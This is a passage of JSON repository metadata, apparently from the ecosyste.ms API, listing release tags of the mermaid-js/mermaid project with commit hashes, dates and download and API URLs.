","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1/manifests"},{"name":"v10.9.4","sha":"80dcf2eaad5b484ea41b5e0a8aee3fa8c5b99d34","kind":"commit","published_at":"2025-08-19T08:40:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4/manifests"},{"name":"mermaid@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.9","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9/manifests"},{"name":"@mermaid-js/tiny@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.2","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2/manifests"},{"name":"mermaid@11.9.0","sha":"767754f4fbfe22e74e0612c5d684e9b58c3c5caf","kind":"commit","published_at":"2025-07-16T08:25:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0/manifests"},{"name":"@mermaid-js/tiny@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1/manifests"},{"name":"@mermaid-js/parser@0.6.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1/manifests"},{"name":"mermaid@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1/manifests"},{"name":"@mermaid-js/tiny@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0/manifests"},{"name":"mermaid@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0/manifests"},{"name":"@mermaid-js/parser@0.6.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0/manifests"},{"name":"@mermaid-js/parser@0.5.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.8","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8/manifests"},{"name":"mermaid@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0/manifests"},{"name":"@mermaid-js/tiny@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.1","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1/manifests"},{"name":"@mermaid-js/parser@0.4.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0/manifests"},{"name":"mermaid@11.6.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0/manifests"},{"name":"mermaid@11.5.0","sha":"41a737f6821df4cdeab75643984912b82c1dff7a","kind":"tag","published_at":"2025-03-13T10:34:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.7","sha":"becadf0a7de509b6cc81e99a04abfa6cba8e7bfd","kind":"tag","published_at":"2024-11-27T17:15:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7/manifests"},{"name":"@mermaid-js/layout-elk@0.1.6","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6/manifests"},{"name":"mermaid@11.4.1","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1/manifests"},{"name":"mermaid@11.4.0","sha":"56f522ec50b5c746be5532686dd465a06215273d","kind":"tag","published_at":"2024-10-30T15:43:30.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0/manifests"},{"name":"v10.9.3","sha":"85ec96a72d06d45cf5d2b88af6ef0aca2d16c187","kind":"commit","published_at":"2024-10-22T08:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3/manifests"},{"name":"@mermaid-js/layout-elk@0.1.5","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5/manifests"},{"name":"mermaid@11.3.0","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0/manifests"},{"name":"v10.9.2","sha":"4dd4997c4d73784a239bac04deded9ff6866d2b4","kind":"commit","published_at":"2024-10-02T09:31:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2/manifests"},{"name":"mermaid@11.2.1","sha":"d63dc319c7c57a9900932fe4920be6a4e54570d5","kind":"tag","published_at":"2024-09-16T16:41:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1/manifests"},{"name":"@mermaid-js/layout-elk@0.1.4","sha":"9c41708d9e439f4cf82c0c954e6c40217f6754e4","kind":"tag","published_at":"2024-09-09T14:03:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4/manifests"},{"name":"mermaid@11.2.0","sha":"80903ec281db9053486f7dbfeae8430d2618e54d","kind":"tag","published_at":"2024-09-09T13:23:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0/manifests"},{"name":"mermaid@11.1.1","sha":"73147196b11e38bf825df17ca5f319aa54748b90","kind":"tag","published_at":"2024-09-06T17:19:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1/manifests"},{"name":"mermaid@11.1.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.3","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3/manifests"},{"name":"@mermaid-js/parser@0.3.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.2","sha":"95274278f39a31f00188935f3d7d1f0c3ccc607a","kind":"tag","published_at":"2024-08-24T07:21:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2/manifests"},{"name":"mermaid@11.0.2","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2/manifests"},{"name":"@mermaid-js/layout-elk@0.1.1","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1","manifests_url":"https://repos.ec